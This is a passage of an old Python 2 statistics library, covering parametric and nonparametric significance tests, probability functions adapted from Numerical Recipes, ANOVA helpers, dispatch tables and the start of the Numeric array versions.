def lttest_ind (a, b, printit=0, name1='Samp1', name2='Samp2', writemode='a'):
"""
Calculates the t-obtained T-test on TWO INDEPENDENT samples of
scores a, and b. From Numerical Recipies, p.483. If printit=1, results
are printed to the screen. If printit='filename', the results are output
to 'filename' using the given writemode (default=append). Returns t-value,
and prob.
Usage: lttest_ind(a,b,printit=0,name1='Samp1',name2='Samp2',writemode='a')
Returns: t-value, two-tailed prob
"""
x1 = mean(a)
x2 = mean(b)
v1 = stdev(a)**2
v2 = stdev(b)**2
n1 = len(a)
n2 = len(b)
df = n1+n2-2
svar = ((n1-1)*v1+(n2-1)*v2)/float(df)
t = (x1-x2)/math.sqrt(svar*(1.0/n1 + 1.0/n2))
prob = betai(0.5*df,0.5,df/(df+t*t))
if printit <> 0:
statname = 'Independent samples T-test.'
outputpairedstats(printit,writemode,
name1,n1,x1,v1,min(a),max(a),
name2,n2,x2,v2,min(b),max(b),
statname,t,prob)
return t,prob
def lttest_rel (a,b,printit=0,name1='Sample1',name2='Sample2',writemode='a'):
"""
Calculates the t-obtained T-test on TWO RELATED samples of scores,
a and b. From Numerical Recipies, p.483. If printit=1, results are
printed to the screen. If printit='filename', the results are output to
'filename' using the given writemode (default=append). Returns t-value,
and prob.
Usage: lttest_rel(a,b,printit=0,name1='Sample1',name2='Sample2',writemode='a')
Returns: t-value, two-tailed prob
"""
if len(a)<>len(b):
raise ValueError, 'Unequal length lists in ttest_rel.'
x1 = mean(a)
x2 = mean(b)
v1 = var(a)
v2 = var(b)
n = len(a)
cov = 0
for i in range(len(a)):
cov = cov + (a[i]-x1) * (b[i]-x2)
df = n-1
cov = cov / float(df)
sd = math.sqrt((v1+v2 - 2.0*cov)/float(n))
t = (x1-x2)/sd
prob = betai(0.5*df,0.5,df/(df+t*t))
if printit <> 0:
statname = 'Related samples T-test.'
outputpairedstats(printit,writemode,
name1,n,x1,v1,min(a),max(a),
name2,n,x2,v2,min(b),max(b),
statname,t,prob)
return t, prob
def lchisquare(f_obs,f_exp=None):
"""
Calculates a one-way chi square for list of observed frequencies and returns
the result. If no expected frequencies are given, the total N is assumed to
be equally distributed across all groups.
Usage: lchisquare(f_obs, f_exp=None) f_obs = list of observed cell freq.
Returns: chisquare-statistic, associated p-value
"""
k = len(f_obs) # number of groups
if f_exp == None:
f_exp = [sum(f_obs)/float(k)] * len(f_obs) # create k bins with = freq.
chisq = 0
for i in range(len(f_obs)):
chisq = chisq + (f_obs[i]-f_exp[i])**2 / float(f_exp[i])
return chisq, chisqprob(chisq, k-1)
def lks_2samp (data1,data2):
"""
Computes the Kolmogorov-Smirnof statistic on 2 samples. From
Numerical Recipies in C, page 493.
Usage: lks_2samp(data1,data2) data1&2 are lists of values for 2 conditions
Returns: KS D-value, associated p-value
"""
j1 = 0
j2 = 0
fn1 = 0.0
fn2 = 0.0
n1 = len(data1)
n2 = len(data2)
en1 = n1
en2 = n2
d = 0.0
data1.sort()
data2.sort()
while j1 < n1 and j2 < n2:
d1=data1[j1]
d2=data2[j2]
if d1 <= d2:
fn1 = (j1)/float(en1)
j1 = j1 + 1
if d2 <= d1:
fn2 = (j2)/float(en2)
j2 = j2 + 1
dt = (fn2-fn1)
if math.fabs(dt) > math.fabs(d):
d = dt
try:
en = math.sqrt(en1*en2/float(en1+en2))
prob = ksprob((en+0.12+0.11/en)*abs(d))
except:
prob = 1.0
return d, prob
def lmannwhitneyu(x,y):
"""
Calculates a Mann-Whitney U statistic on the provided scores and
returns the result. Use only when the n in each condition is < 20 and
you have 2 independent samples of ranks. NOTE: Mann-Whitney U is
significant if the u-obtained is LESS THAN or equal to the critical
value of U found in the tables. Equivalent to Kruskal-Wallis H with
just 2 groups.
Usage: lmannwhitneyu(data)
Returns: u-statistic, one-tailed p-value (i.e., p(z(U)))
"""
n1 = len(x)
n2 = len(y)
ranked = rankdata(x+y)
rankx = ranked[0:n1] # get the x-ranks
ranky = ranked[n1:] # the rest are y-ranks
u1 = n1*n2 + (n1*(n1+1))/2.0 - sum(rankx) # calc U for x
u2 = n1*n2 - u1 # remainder is U for y
bigu = max(u1,u2)
smallu = min(u1,u2)
T = math.sqrt(tiecorrect(ranked)) # correction factor for tied scores
if T == 0:
raise ValueError, 'All numbers are identical in lmannwhitneyu'
sd = math.sqrt(T*n1*n2*(n1+n2+1)/12.0)
z = abs((bigu-n1*n2/2.0) / sd) # normal approximation for prob calc
return smallu, 1.0 - zprob(z)
def ltiecorrect(rankvals):
"""
Corrects for ties in Mann Whitney U and Kruskal Wallis H tests. See
Siegel, S. (1956) Nonparametric Statistics for the Behavioral Sciences.
New York: McGraw-Hill. Code adapted from |Stat rankind.c code.
Usage: ltiecorrect(rankvals)
Returns: T correction factor for U or H
"""
sorted,posn = shellsort(rankvals)
n = len(sorted)
T = 0.0
i = 0
while (i<n-1):
if sorted[i] == sorted[i+1]:
nties = 1
while (i<n-1) and (sorted[i] == sorted[i+1]):
nties = nties +1
i = i +1
T = T + nties**3 - nties
i = i+1
T = T / float(n**3-n)
return 1.0 - T
def lranksums(x,y):
"""
Calculates the rank sums statistic on the provided scores and
returns the result. Use only when the n in each condition is > 20 and you
have 2 independent samples of ranks.
Usage: lranksums(x,y)
Returns: a z-statistic, two-tailed p-value
"""
n1 = len(x)
n2 = len(y)
alldata = x+y
ranked = rankdata(alldata)
x = ranked[:n1]
y = ranked[n1:]
s = sum(x)
expected = n1*(n1+n2+1) / 2.0
z = (s - expected) / math.sqrt(n1*n2*(n1+n2+1)/12.0)
prob = 2*(1.0 -zprob(abs(z)))
return z, prob
def lwilcoxont(x,y):
"""
Calculates the Wilcoxon T-test for related samples and returns the
result. A non-parametric T-test.
Usage: lwilcoxont(x,y)
Returns: a t-statistic, two-tail probability estimate
"""
if len(x) <> len(y):
raise ValueError, 'Unequal N in wilcoxont. Aborting.'
d=[]
for i in range(len(x)):
diff = x[i] - y[i]
if diff <> 0:
d.append(diff)
count = len(d)
absd = map(abs,d)
absranked = rankdata(absd)
r_plus = 0.0
r_minus = 0.0
for i in range(len(absd)):
if d[i] < 0:
r_minus = r_minus + absranked[i]
else:
r_plus = r_plus + absranked[i]
wt = min(r_plus, r_minus)
mn = count * (count+1) * 0.25
se = math.sqrt(count*(count+1)*(2.0*count+1.0)/24.0)
z = math.fabs(wt-mn) / se
prob = 2*(1.0 -zprob(abs(z)))
return wt, prob
def lkruskalwallish(*args):
"""
The Kruskal-Wallis H-test is a non-parametric ANOVA for 3 or more
groups, requiring at least 5 subjects in each group. This function
calculates the Kruskal-Wallis H-test for 3 or more independent samples
and returns the result.
Usage: lkruskalwallish(*args)
Returns: H-statistic (corrected for ties), associated p-value
"""
args = list(args)
n = [0]*len(args)
all = []
n = map(len,args)
for i in range(len(args)):
all = all + args[i]
ranked = rankdata(all)
T = tiecorrect(ranked)
for i in range(len(args)):
args[i] = ranked[0:n[i]]
del ranked[0:n[i]]
rsums = []
for i in range(len(args)):
rsums.append(sum(args[i])**2)
rsums[i] = rsums[i] / float(n[i])
ssbn = sum(rsums)
totaln = sum(n)
h = 12.0 / (totaln*(totaln+1)) * ssbn - 3*(totaln+1)
df = len(args) - 1
if T == 0:
raise ValueError, 'All numbers are identical in lkruskalwallish'
h = h / float(T)
return h, chisqprob(h,df)
def lfriedmanchisquare(*args):
"""
Friedman Chi-Square is a non-parametric, one-way within-subjects
ANOVA. This function calculates the Friedman Chi-square test for repeated
measures and returns the result, along with the associated probability
value. It assumes 3 or more repeated measures. Only 3 levels requires a
minimum of 10 subjects in the study. Four levels requires 5 subjects per
level(??).
Usage: lfriedmanchisquare(*args)
Returns: chi-square statistic, associated p-value
"""
k = len(args)
if k < 3:
raise ValueError, 'Less than 3 levels. Friedman test not appropriate.'
n = len(args[0])
data = apply(pstat.abut,tuple(args))
for i in range(len(data)):
data[i] = rankdata(data[i])
ssbn = 0
for i in range(k):
ssbn = ssbn + sum(args[i])**2
chisq = 12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)
return chisq, chisqprob(chisq,k-1)
####################################
#### PROBABILITY CALCULATIONS ####
####################################
def lchisqprob(chisq,df):
"""
Returns the (1-tailed) probability value associated with the provided
chi-square value and df. Adapted from chisq.c in Gary Perlman's |Stat.
Usage: lchisqprob(chisq,df)
"""
BIG = 20.0
def ex(x):
BIG = 20.0
if x < -BIG:
return 0.0
else:
return math.exp(x)
if chisq <=0 or df < 1:
return 1.0
a = 0.5 * chisq
if df%2 == 0:
even = 1
else:
even = 0
if df > 1:
y = ex(-a)
if even:
s = y
else:
s = 2.0 * zprob(-math.sqrt(chisq))
if (df > 2):
chisq = 0.5 * (df - 1.0)
if even:
z = 1.0
else:
z = 0.5
if a > BIG:
if even:
e = 0.0
else:
e = math.log(math.sqrt(math.pi))
c = math.log(a)
while (z <= chisq):
e = math.log(z) + e
s = s + ex(c*z-a-e)
z = z + 1.0
return s
else:
if even:
e = 1.0
else:
e = 1.0 / math.sqrt(math.pi) / math.sqrt(a)
c = 0.0
while (z <= chisq):
e = e * (a/float(z))
c = c + e
z = z + 1.0
return (c*y+s)
else:
return s
def lerfcc(x):
"""
Returns the complementary error function erfc(x) with fractional
error everywhere less than 1.2e-7. Adapted from Numerical Recipies.
Usage: lerfcc(x)
"""
z = abs(x)
t = 1.0 / (1.0+0.5*z)
ans = t * math.exp(-z*z-1.26551223 + t*(1.00002368+t*(0.37409196+t*(0.09678418+t*(-0.18628806+t*(0.27886807+t*(-1.13520398+t*(1.48851587+t*(-0.82215223+t*0.17087277)))))))))
if x >= 0:
return ans
else:
return 2.0 - ans
def lzprob(z):
"""
Returns the area under the normal curve 'to the left of' the given z value.
Thus,
for z<0, zprob(z) = 1-tail probability
for z>0, 1.0-zprob(z) = 1-tail probability
for any z, 2.0*(1.0-zprob(abs(z))) = 2-tail probability
Adapted from z.c in Gary Perlman's |Stat.
Usage: lzprob(z)
"""
Z_MAX = 6.0 # maximum meaningful z-value
if z == 0.0:
x = 0.0
else:
y = 0.5 * math.fabs(z)
if y >= (Z_MAX*0.5):
x = 1.0
elif (y < 1.0):
w = y*y
x = ((((((((0.000124818987 * w
-0.001075204047) * w +0.005198775019) * w
-0.019198292004) * w +0.059054035642) * w
-0.151968751364) * w +0.319152932694) * w
-0.531923007300) * w +0.797884560593) * y * 2.0
else:
y = y - 2.0
x = (((((((((((((-0.000045255659 * y
+0.000152529290) * y -0.000019538132) * y
-0.000676904986) * y +0.001390604284) * y
-0.000794620820) * y -0.002034254874) * y
+0.006549791214) * y -0.010557625006) * y
+0.011630447319) * y -0.009279453341) * y
+0.005353579108) * y -0.002141268741) * y
+0.000535310849) * y +0.999936657524
if z > 0.0:
prob = ((x+1.0)*0.5)
else:
prob = ((1.0-x)*0.5)
return prob
def lksprob(alam):
"""
Computes a Kolmolgorov-Smirnov t-test significance level. Adapted from
Numerical Recipies.
Usage: lksprob(alam)
"""
fac = 2.0
sum = 0.0
termbf = 0.0
a2 = -2.0*alam*alam
for j in range(1,201):
term = fac*math.exp(a2*j*j)
sum = sum + term
if math.fabs(term) <= (0.001*termbf) or math.fabs(term) < (1.0e-8*sum):
return sum
fac = -fac
termbf = math.fabs(term)
return 1.0 # Get here only if fails to converge; was 0.0!!
def lfprob (dfnum, dfden, F):
"""
Returns the (1-tailed) significance level (p-value) of an F
statistic given the degrees of freedom for the numerator (dfR-dfF) and
the degrees of freedom for the denominator (dfF).
Usage: lfprob(dfnum, dfden, F) where usually dfnum=dfbn, dfden=dfwn
"""
p = betai(0.5*dfden, 0.5*dfnum, dfden/float(dfden+dfnum*F))
return p
def lbetacf(a,b,x):
"""
This function evaluates the continued fraction form of the incomplete
Beta function, betai. (Adapted from: Numerical Recipies in C.)
Usage: lbetacf(a,b,x)
"""
ITMAX = 200
EPS = 3.0e-7
bm = az = am = 1.0
qab = a+b
qap = a+1.0
qam = a-1.0
bz = 1.0-qab*x/qap
for i in range(ITMAX+1):
em = float(i+1)
tem = em + em
d = em*(b-em)*x/((qam+tem)*(a+tem))
ap = az + d*am
bp = bz+d*bm
d = -(a+em)*(qab+em)*x/((qap+tem)*(a+tem))
app = ap+d*az
bpp = bp+d*bz
aold = az
am = ap/bpp
bm = bp/bpp
az = app/bpp
bz = 1.0
if (abs(az-aold)<(EPS*abs(az))):
return az
print 'a or b too big, or ITMAX too small in Betacf.'
def lgammln(xx):
"""
Returns the gamma function of xx.
Gamma(z) = Integral(0,infinity) of t^(z-1)exp(-t) dt.
(Adapted from: Numerical Recipies in C.)
Usage: lgammln(xx)
"""
coeff = [76.18009173, -86.50532033, 24.01409822, -1.231739516,
0.120858003e-2, -0.536382e-5]
x = xx - 1.0
tmp = x + 5.5
tmp = tmp - (x+0.5)*math.log(tmp)
ser = 1.0
for j in range(len(coeff)):
x = x + 1
ser = ser + coeff[j]/x
return -tmp + math.log(2.50662827465*ser)
def lbetai(a,b,x):
"""
Returns the incomplete beta function:
I-sub-x(a,b) = 1/B(a,b)*(Integral(0,x) of t^(a-1)(1-t)^(b-1) dt)
where a,b>0 and B(a,b) = G(a)*G(b)/(G(a+b)) where G(a) is the gamma
function of a. The continued fraction formulation is implemented here,
using the betacf function. (Adapted from: Numerical Recipies in C.)
Usage: lbetai(a,b,x)
"""
if (x<0.0 or x>1.0):
raise ValueError, 'Bad x in lbetai'
if (x==0.0 or x==1.0):
bt = 0.0
else:
bt = math.exp(gammln(a+b)-gammln(a)-gammln(b)+a*math.log(x)+b*
math.log(1.0-x))
if (x<(a+1.0)/(a+b+2.0)):
return bt*betacf(a,b,x)/float(a)
else:
return 1.0-bt*betacf(b,a,1.0-x)/float(b)
####################################
####### ANOVA CALCULATIONS #######
####################################
def lF_oneway(*lists):
"""
Performs a 1-way ANOVA, returning an F-value and probability given
any number of groups. From Heiman, pp.394-7.
Usage: F_oneway(*lists) where *lists is any number of lists, one per
treatment group
Returns: F value, one-tailed p-value
"""
a = len(lists) # ANOVA on 'a' groups, each in it's own list
means = [0]*a
vars = [0]*a
ns = [0]*a
alldata = []
tmp = map(N.array,lists)
means = map(amean,tmp)
vars = map(avar,tmp)
ns = map(len,lists)
for i in range(len(lists)):
alldata = alldata + lists[i]
alldata = N.array(alldata)
bign = len(alldata)
sstot = ass(alldata)-(asquare_of_sums(alldata)/float(bign))
ssbn = 0
for list in lists:
ssbn = ssbn + asquare_of_sums(N.array(list))/float(len(list))
ssbn = ssbn - (asquare_of_sums(alldata)/float(bign))
sswn = sstot-ssbn
dfbn = a-1
dfwn = bign - a
msb = ssbn/float(dfbn)
msw = sswn/float(dfwn)
f = msb/msw
prob = fprob(dfbn,dfwn,f)
return f, prob
def lF_value (ER,EF,dfnum,dfden):
"""
Returns an F-statistic given the following:
ER = error associated with the null hypothesis (the Restricted model)
EF = error associated with the alternate hypothesis (the Full model)
dfR-dfF = degrees of freedom of the numerator
dfF = degrees of freedom associated with the denominator/Full model
Usage: lF_value(ER,EF,dfnum,dfden)
"""
return ((ER-EF)/float(dfnum) / (EF/float(dfden)))
####################################
######## SUPPORT FUNCTIONS #######
####################################
def writecc (listoflists,file,writetype='w',extra=2):
"""
Writes a list of lists to a file in columns, customized by the max
size of items within the columns (max size of items in col, +2 characters)
to specified file. File-overwrite is the default.
Usage: writecc (listoflists,file,writetype='w',extra=2)
Returns: None
"""
if type(listoflists[0]) not in [ListType,TupleType]:
listoflists = [listoflists]
outfile = open(file,writetype)
rowstokill = []
list2print = copy.deepcopy(listoflists)
for i in range(len(listoflists)):
if listoflists[i] == ['\n'] or listoflists[i]=='\n' or listoflists[i]=='dashes':
rowstokill = rowstokill + [i]
rowstokill.reverse()
for row in rowstokill:
del list2print[row]
maxsize = [0]*len(list2print[0])
for col in range(len(list2print[0])):
items = pstat.colex(list2print,col)
items = map(pstat.makestr,items)
maxsize[col] = max(map(len,items)) + extra
for row in listoflists:
if row == ['\n'] or row == '\n':
outfile.write('\n')
elif row == ['dashes'] or row == 'dashes':
dashes = [0]*len(maxsize)
for j in range(len(maxsize)):
dashes[j] = '-'*(maxsize[j]-2)
outfile.write(pstat.lineincustcols(dashes,maxsize))
else:
outfile.write(pstat.lineincustcols(row,maxsize))
outfile.write('\n')
outfile.close()
return None
def lincr(l,cap): # to increment a list up to a max-list of 'cap'
"""
Simulate a counting system from an n-dimensional list.
Usage: lincr(l,cap) l=list to increment, cap=max values for each list pos'n
Returns: next set of values for list l, OR -1 (if overflow)
"""
l[0] = l[0] + 1 # e.g., [0,0,0] --> [2,4,3] (=cap)
for i in range(len(l)):
if l[i] > cap[i] and i < len(l)-1: # if carryover AND not done
l[i] = 0
l[i+1] = l[i+1] + 1
elif l[i] > cap[i] and i == len(l)-1: # overflow past last column, must be finished
l = -1
return l
def lsum (inlist):
"""
Returns the sum of the items in the passed list.
Usage: lsum(inlist)
"""
s = 0
for item in inlist:
s = s + item
return s
def lcumsum (inlist):
"""
Returns a list consisting of the cumulative sum of the items in the
passed list.
Usage: lcumsum(inlist)
"""
newlist = copy.deepcopy(inlist)
for i in range(1,len(newlist)):
newlist[i] = newlist[i] + newlist[i-1]
return newlist
def lss(inlist):
"""
Squares each value in the passed list, adds up these squares and
returns the result.
Usage: lss(inlist)
"""
ss = 0
for item in inlist:
ss = ss + item*item
return ss
def lsummult (list1,list2):
"""
Multiplies elements in list1 and list2, element by element, and
returns the sum of all resulting multiplications. Must provide equal
length lists.
Usage: lsummult(list1,list2)
"""
if len(list1) <> len(list2):
raise ValueError, "Lists not equal length in summult."
s = 0
for item1,item2 in pstat.abut(list1,list2):
s = s + item1*item2
return s
def lsumdiffsquared(x,y):
"""
Takes pairwise differences of the values in lists x and y, squares
these differences, and returns the sum of these squares.
Usage: lsumdiffsquared(x,y)
Returns: sum[(x[i]-y[i])**2]
"""
sds = 0
for i in range(len(x)):
sds = sds + (x[i]-y[i])**2
return sds
def lsquare_of_sums(inlist):
"""
Adds the values in the passed list, squares the sum, and returns
the result.
Usage: lsquare_of_sums(inlist)
Returns: sum(inlist[i])**2
"""
s = sum(inlist)
return float(s)*s
def lshellsort(inlist):
"""
Shellsort algorithm. Sorts a 1D-list.
Usage: lshellsort(inlist)
Returns: sorted-inlist, sorting-index-vector (for original list)
"""
n = len(inlist)
svec = copy.deepcopy(inlist)
ivec = range(n)
gap = n/2 # integer division needed
while gap >0:
for i in range(gap,n):
for j in range(i-gap,-1,-gap):
while j>=0 and svec[j]>svec[j+gap]:
temp = svec[j]
svec[j] = svec[j+gap]
svec[j+gap] = temp
itemp = ivec[j]
ivec[j] = ivec[j+gap]
ivec[j+gap] = itemp
gap = gap / 2 # integer division needed
# svec is now sorted inlist, and ivec has the order svec[i] = vec[ivec[i]]
return svec, ivec
def lrankdata(inlist):
"""
Ranks the data in inlist, dealing with ties appropritely. Assumes
a 1D inlist. Adapted from Gary Perlman's |Stat ranksort.
Usage: lrankdata(inlist)
Returns: a list of length equal to inlist, containing rank scores
"""
n = len(inlist)
svec, ivec = shellsort(inlist)
sumranks = 0
dupcount = 0
newlist = [0]*n
for i in range(n):
sumranks = sumranks + i
dupcount = dupcount + 1
if i==n-1 or svec[i] <> svec[i+1]:
averank = sumranks / float(dupcount) + 1
for j in range(i-dupcount+1,i+1):
newlist[ivec[j]] = averank
sumranks = 0
dupcount = 0
return newlist
def outputpairedstats(fname,writemode,name1,n1,m1,se1,min1,max1,name2,n2,m2,se2,min2,max2,statname,stat,prob):
"""
Prints or write to a file stats for two groups, using the name, n,
mean, sterr, min and max for each group, as well as the statistic name,
its value, and the associated p-value.
Usage: outputpairedstats(fname,writemode,
name1,n1,mean1,stderr1,min1,max1,
name2,n2,mean2,stderr2,min2,max2,
statname,stat,prob)
Returns: None
"""
suffix = '' # for *s after the p-value
try:
x = prob.shape
prob = prob[0]
except:
pass
if prob < 0.001: suffix = ' ***'
elif prob < 0.01: suffix = ' **'
elif prob < 0.05: suffix = ' *'
title = [['Name','N','Mean','SD','Min','Max']]
lofl = title+[[name1,n1,round(m1,3),round(math.sqrt(se1),3),min1,max1],
[name2,n2,round(m2,3),round(math.sqrt(se2),3),min2,max2]]
if type(fname)<>StringType or len(fname)==0:
print
print statname
print
pstat.printcc(lofl)
print
try:
if stat.shape == ():
stat = stat[0]
if prob.shape == ():
prob = prob[0]
except:
pass
print 'Test statistic = ',round(stat,3),' p = ',round(prob,3),suffix
print
else:
file = open(fname,writemode)
file.write('\n'+statname+'\n\n')
file.close()
writecc(lofl,fname,'a')
file = open(fname,'a')
try:
if stat.shape == ():
stat = stat[0]
if prob.shape == ():
prob = prob[0]
except:
pass
file.write(pstat.list2string(['\nTest statistic = ',round(stat,4),' p = ',round(prob,4),suffix,'\n\n']))
file.close()
return None
def lfindwithin (data):
"""
Returns an integer representing a binary vector, where 1=within-
subject factor, 0=between. Input equals the entire data 2D list (i.e.,
column 0=random factor, column -1=measured values (those two are skipped).
Note: input data is in |Stat format ... a list of lists ("2D list") with
one row per measured value, first column=subject identifier, last column=
score, one in-between column per factor (these columns contain level
designations on each factor). See also stats.anova.__doc__.
Usage: lfindwithin(data) data in |Stat format
"""
numfact = len(data[0])-1
withinvec = 0
for col in range(1,numfact):
examplelevel = pstat.unique(pstat.colex(data,col))[0]
rows = pstat.linexand(data,col,examplelevel) # get 1 level of this factor
factsubjs = pstat.unique(pstat.colex(rows,0))
allsubjs = pstat.unique(pstat.colex(data,0))
if len(factsubjs) == len(allsubjs): # fewer Ss than scores on this factor?
withinvec = withinvec + (1 << col)
return withinvec
#########################################################
#########################################################
####### DISPATCH LISTS AND TUPLES TO ABOVE FCNS #########
#########################################################
#########################################################
## CENTRAL TENDENCY:
geometricmean = Dispatch ( (lgeometricmean, (ListType, TupleType)), )
harmonicmean = Dispatch ( (lharmonicmean, (ListType, TupleType)), )
mean = Dispatch ( (lmean, (ListType, TupleType)), )
median = Dispatch ( (lmedian, (ListType, TupleType)), )
medianscore = Dispatch ( (lmedianscore, (ListType, TupleType)), )
mode = Dispatch ( (lmode, (ListType, TupleType)), )
## MOMENTS:
moment = Dispatch ( (lmoment, (ListType, TupleType)), )
variation = Dispatch ( (lvariation, (ListType, TupleType)), )
skew = Dispatch ( (lskew, (ListType, TupleType)), )
kurtosis = Dispatch ( (lkurtosis, (ListType, TupleType)), )
describe = Dispatch ( (ldescribe, (ListType, TupleType)), )
## FREQUENCY STATISTICS:
itemfreq = Dispatch ( (litemfreq, (ListType, TupleType)), )
scoreatpercentile = Dispatch ( (lscoreatpercentile, (ListType, TupleType)), )
percentileofscore = Dispatch ( (lpercentileofscore, (ListType, TupleType)), )
histogram = Dispatch ( (lhistogram, (ListType, TupleType)), )
cumfreq = Dispatch ( (lcumfreq, (ListType, TupleType)), )
relfreq = Dispatch ( (lrelfreq, (ListType, TupleType)), )
## VARIABILITY:
obrientransform = Dispatch ( (lobrientransform, (ListType, TupleType)), )
samplevar = Dispatch ( (lsamplevar, (ListType, TupleType)), )
samplestdev = Dispatch ( (lsamplestdev, (ListType, TupleType)), )
var = Dispatch ( (lvar, (ListType, TupleType)), )
stdev = Dispatch ( (lstdev, (ListType, TupleType)), )
sterr = Dispatch ( (lsterr, (ListType, TupleType)), )
sem = Dispatch ( (lsem, (ListType, TupleType)), )
z = Dispatch ( (lz, (ListType, TupleType)), )
zs = Dispatch ( (lzs, (ListType, TupleType)), )
## TRIMMING FCNS:
trimboth = Dispatch ( (ltrimboth, (ListType, TupleType)), )
trim1 = Dispatch ( (ltrim1, (ListType, TupleType)), )
## CORRELATION FCNS:
paired = Dispatch ( (lpaired, (ListType, TupleType)), )
pearsonr = Dispatch ( (lpearsonr, (ListType, TupleType)), )
origin_pearsonr = Dispatch((lorigin_pearsonr,(ListType, TupleType)), )
spearmanr = Dispatch ( (lspearmanr, (ListType, TupleType)), )
pointbiserialr = Dispatch ( (lpointbiserialr, (ListType, TupleType)), )
kendalltau = Dispatch ( (lkendalltau, (ListType, TupleType)), )
linregress = Dispatch ( (llinregress, (ListType, TupleType)), )
## INFERENTIAL STATS:
ttest_1samp = Dispatch ( (lttest_1samp, (ListType, TupleType)), )
ttest_ind = Dispatch ( (lttest_ind, (ListType, TupleType)), )
ttest_rel = Dispatch ( (lttest_rel, (ListType, TupleType)), )
chisquare = Dispatch ( (lchisquare, (ListType, TupleType)), )
ks_2samp = Dispatch ( (lks_2samp, (ListType, TupleType)), )
mannwhitneyu = Dispatch ( (lmannwhitneyu, (ListType, TupleType)), )
ranksums = Dispatch ( (lranksums, (ListType, TupleType)), )
tiecorrect = Dispatch ( (ltiecorrect, (ListType, TupleType)), )
wilcoxont = Dispatch ( (lwilcoxont, (ListType, TupleType)), )
kruskalwallish = Dispatch ( (lkruskalwallish, (ListType, TupleType)), )
friedmanchisquare = Dispatch ( (lfriedmanchisquare, (ListType, TupleType)), )
## PROBABILITY CALCS:
chisqprob = Dispatch ( (lchisqprob, (IntType, FloatType)), )
zprob = Dispatch ( (lzprob, (IntType, FloatType)), )
ksprob = Dispatch ( (lksprob, (IntType, FloatType)), )
fprob = Dispatch ( (lfprob, (IntType, FloatType)), )
betacf = Dispatch ( (lbetacf, (IntType, FloatType)), )
betai = Dispatch ( (lbetai, (IntType, FloatType)), )
erfcc = Dispatch ( (lerfcc, (IntType, FloatType)), )
gammln = Dispatch ( (lgammln, (IntType, FloatType)), )
## ANOVA FUNCTIONS:
F_oneway = Dispatch ( (lF_oneway, (ListType, TupleType)), )
F_value = Dispatch ( (lF_value, (ListType, TupleType)), )
## SUPPORT FUNCTIONS:
incr = Dispatch ( (lincr, (ListType, TupleType)), )
sum = Dispatch ( (lsum, (ListType, TupleType)), )
cumsum = Dispatch ( (lcumsum, (ListType, TupleType)), )
ss = Dispatch ( (lss, (ListType, TupleType)), )
summult = Dispatch ( (lsummult, (ListType, TupleType)), )
square_of_sums = Dispatch ( (lsquare_of_sums, (ListType, TupleType)), )
sumdiffsquared = Dispatch ( (lsumdiffsquared, (ListType, TupleType)), )
shellsort = Dispatch ( (lshellsort, (ListType, TupleType)), )
rankdata = Dispatch ( (lrankdata, (ListType, TupleType)), )
findwithin = Dispatch ( (lfindwithin, (ListType, TupleType)), )
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
try: # DEFINE THESE *ONLY* IF NUMERIC IS AVAILABLE
import Numeric
N = Numeric
import LinearAlgebra
LA = LinearAlgebra
#####################################
######## ACENTRAL TENDENCY ########
#####################################
def ageometricmean (inarray,dimension=None,keepdims=0):
"""
Calculates the geometric mean of the values in the passed array.
That is: n-th root of (x1 * x2 * ... * xn). Defaults to ALL values in
the passed array. Use dimension=None to flatten array first. REMEMBER: if
dimension=0, it collapses over dimension 0 ('rows' in a 2D array) only, and
if dimension is a sequence, it collapses over all specified dimensions. If
keepdims is set to 1, the resulting array will have as many dimensions as
inarray, with only 1 'level' per dim that was collapsed over.
Usage: ageometricmean(inarray,dimension=None,keepdims=0)
Returns: geometric mean computed over dim(s) listed in dimension
"""
inarray = N.array(inarray,N.Float)
if dimension == None:
inarray = N.ravel(inarray)
size = len(inarray)
mult = N.power(inarray,1.0/size)
mult = N.multiply.reduce(mult)
elif type(dimension) in [IntType,FloatType]:
size = inarray.shape[dimension]
mult = N.power(inarray,1.0/size)
mult = N.multiply.reduce(mult,dimension)
if keepdims == 1:
shp = list(inarray.shape)
shp[dimension] = 1
sum = N.reshape(sum,shp)
else: # must be a SEQUENCE of dims to average over
dims = list(dimension)
dims.sort()
dims.reverse()
size = N.array(N.multiply.reduce(N.take(inarray.shape,dims)),N.Float)
mult = N.power(inarray,1.0/size)
for dim in dims:
mult = N.multiply.reduce(mult,dim)
if keepdims == 1:
shp = list(inarray.shape)
for dim in dims:
shp[dim] = 1
mult = N.reshape(mult,shp)
return mult
def aharmonicmean (inarray,dimension=None,keepdims=0):
"""
Calculates the harmonic mean of the values in the passed array.
That is: n / (1/x1 + 1/x2 + ... + 1/xn). Defaults to ALL values in
the passed array. Use dimension=None to flatten array first. REMEMBER: if
dimension=0, it collapses over dimension 0 ('rows' in a 2D array) only, and
if dimension is a sequence, it collapses over all specified dimensions. If
keepdims is set to 1, the resulting array will have as many dimensions as
inarray, with only 1 'level' per dim that was collapsed over.
Usage: aharmonicmean(inarray,dimension=None,keepdims=0)
Returns: harmonic mean computed over dim(s) in dimension
"""
inarray = inarray.astype(N.Float)
if dimension == None:
inarray = N.ravel(inarray)
size = len(inarray)
s = N.add.reduce(1.0 / inarray)
elif type(dimension) in [IntType,FloatType]:
size = float(inarray.shape[dimension])
s = N.add.reduce(1.0/inarray, dimension)
if keepdims == 1:
shp = list(inarray.shape)
shp[dimension] = 1
